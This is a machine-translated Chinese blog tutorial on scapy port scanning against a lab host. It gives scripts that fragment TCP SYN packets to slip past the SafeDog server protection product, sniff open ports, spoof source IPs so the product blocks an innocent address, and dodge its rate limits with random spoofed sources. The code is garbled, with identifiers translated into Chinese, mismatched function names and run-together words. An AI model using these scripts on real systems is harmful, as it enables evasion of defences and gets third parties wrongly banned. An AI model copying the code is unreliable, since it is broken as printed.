大家好，今天来为大家解答端口扫描实践这个问题的一些问题点，包括也一样很多人还不知道，因此呢，今天就来为大家分析分析，现在让我们一起来看看吧！如果解决了您的问题，还望您关注下本站哦，谢谢~

环境：Linux、python2.7

库：scapy（这个库只适合学习，不能在真实环境中使用，太慢了，连无状态端口扫描都受不了）

IP数据包

这只能通过在正在使用的端口上使用碎片来绕过。如何进行分片需要了解IP数据包格式。 IP有一个固定的20字节的报头。碎片化中更值得关注的是：

标识：相同的标识字段值使得每个分片的数据报片段能够正确地重新组装成原始数据报。

标志（Flags）:占用3位，但目前只有2位有意义。标志字段中的最低位被记录为MF（更多片段）。 MF=1表示后面还有分片数据报。 MF=0 表示这是几个数据报片段中的最后一个。标志字段中间的位记录为DF（Don’t Fragment），意思是“不能分段”。仅当DF=0 时才允许分片。

片段偏移（Fragment offset）:占用13位。较长的数据包分片后，某个分片在原始数据包中的相对位置。换句话说，片段相对于用户数据字段的起始点从哪里开始。分片偏移移位单位为8字节，这意味着每个分片的长度必须是8字节（64位）的整数倍。

其他如校验和和ttl 值将由scapy 本身处理。这里proto=0x06是tcp协议，flags=0x01需要分片，frag=0,1,2分片顺序。

one_part_request=IP(dst=dst_ip, ttl=49, flags=0x01, proto=0x06, id=packet_id, frag=0)two_part_request=IP(dst=dst_ip, ttl=49, flags=0x01, proto=0x06, id=packet_id, frag=1) Three_part_request=IP(dst=dst_ip, ttl=49, flags=0x00, proto=0x06, id=packet_id, frag=2)TCP 消息

在构造TCP消息时，只有校验和的构造稍微麻烦一些。我直接从wireshark上抓取了第一条握手消息。

1. TCP/UDP会在计算中添加一个额外的伪头。伪报头包括：32位源/目的IP地址、8位补零、8位协议号、16位TCP/UDP报文长度（报头+数据）

2. 校验和的两个字段需要设置为0x0000。下面的data3的前两个字节是校验和，已被设置为0。

数据1=’\xb2\x00\x00\x50\xd7\x23\xb8\xa9′ 数据2=’\x00\x00\x00\x00\x50\x02\x04\x00′ 数据3=’\x00\x00\x00\ x00’phdr=伪头(one_part_request.src, one_part_request.dst, socket.IPPROTO_TCP, len(tcp_raw))path_int=校验和(phdr + tcp_raw)path_hex=格式(path_int, ’04x’)print(path_hex)data3=path_hex.decode (‘hex’) + data3[2:] 这样，TCP报文也就构造完成了。

from scapy.all import *def fake_header(ip_src, ip_dst, ip_proto, length): ”’ 根据RFC768 返回伪标头”’ # 准备伪标头的二进制表示return struct.pack(‘!4s4sHH’, inet_aton(ip_src), inet_aton(ip_dst), ip_proto, length)#datadata1=’\xb2\x00\x00\x50\xd7\x23\xb8\xa9’data2=’\x00\x00\x00\x00\x50\x02 \x04\x00’data3=’\x00\x00\x00\x00’dst_ip=’192.168.100.101’packet_id=random.randint(10000, 2**16-1)tcp_raw=data1 + data2 + data3#设置参数ip packetone_part_request=IP(dst=dst_ip, ttl=49, flags=0x01, proto=0x06, id=packet_id, frag=0)two_part_request=IP(dst=dst_ip, ttl=49, flags=0x01, proto=0x06, id=packet_id, frag=1) Three_part_request=IP(dst=dst_ip, ttl=49, flags=0x00, proto=0x06, id=packet_id, frag=2)# 替换data中的校验和3phdr=pseudo_header(one_part_request.src, one_part_request.dst , socket.IPPROTO_TCP, len(tcp_raw))path_int=checksum(phdr + tcp_raw)path_hex=format(path_int, ’04x’)print(path_hex)data3=path_hex.decode(‘hex’) + data3[2:]# sendend(上面比较复杂，因为我对scapy包不熟悉。让我们使用scapy 来构建tcp 包。

使用scrapy构建分片

监视器

使用无状态扫描监控网卡的返回包，分析端口是否开放。这里的过滤器使用了tcpdump的语法。

from scapy.all import *iface=’eth0’target_ip=’192.168.100.101’def prn(pkt): print(pkt[IP].src + ‘:’ + str(pkt[IP].sport) + ‘ open’ )def Listen_port(): sniff(iface=iface, filter=’tcp and src host %s and tcp[13:1]=18’%target_ip, prn=prn)listen_port()192.168.100.100 是扫描仪ip，192.168.100.101是目标ip。

当wireshark抓包时，我们可以看到发送了三个IPv4数据包，然后192.168.100.101返回了SYN+ACK消息。

我们的听众还听到：

192.168.100.101:80打开查看消息：由于IP数据包小于60字节，链路层会用0x00填充到60字节。

伪造源ip

发现源IP也可以伪造。因为是在同一个网段，所以可以伪造。安全狗会直接将IP数据包中的IP解析为真实IP。

误封IP

由于伪造IP，可以禁止某个IP访问安装了安全狗的服务器。

from scapy.all import *for i in range(1,1000): send(IP(src=’192.168.100.133′,dst=’192.168.100.101′)/TCP(sport=RandShort(),dport=i), verbose=False) 绕过频率限制

from scapy.all import *import socketip=socket.inet_ntoa(struct.pack(‘I’, random.randint(1,0xffffffff)))for i in range(435,446): send(IP(src=ip,dst=’ 192.168.100.101′)/TCP (sport=RandShort(), dport=i), verbose=False) 伪造源IP时，仍然会返回到本机。当B收到A发来的数据包时，直接进行从A到B的反向MAC替换过程。在反向过程中，每一步都会省略ARP请求NEXT HOP的MAC，因为MAC表已经建立。无需通过IP和子网掩码计算是否在同一网段，并决定是直接发送目的IP还是路由发送。因此，源IP是伪造的，但是仍然可以收到返回报文，安全狗记录的就是那些伪造的IP。

以上是针对同一网段的IP。如果有NAT，源IP和端口就会改变，所以即使伪造访问的是你的真实IP，也不会收到返回报文，因为网关会疯狂发送arp报文。寻找这些假IP，192.168.100.2疯狂告诉这些假源IP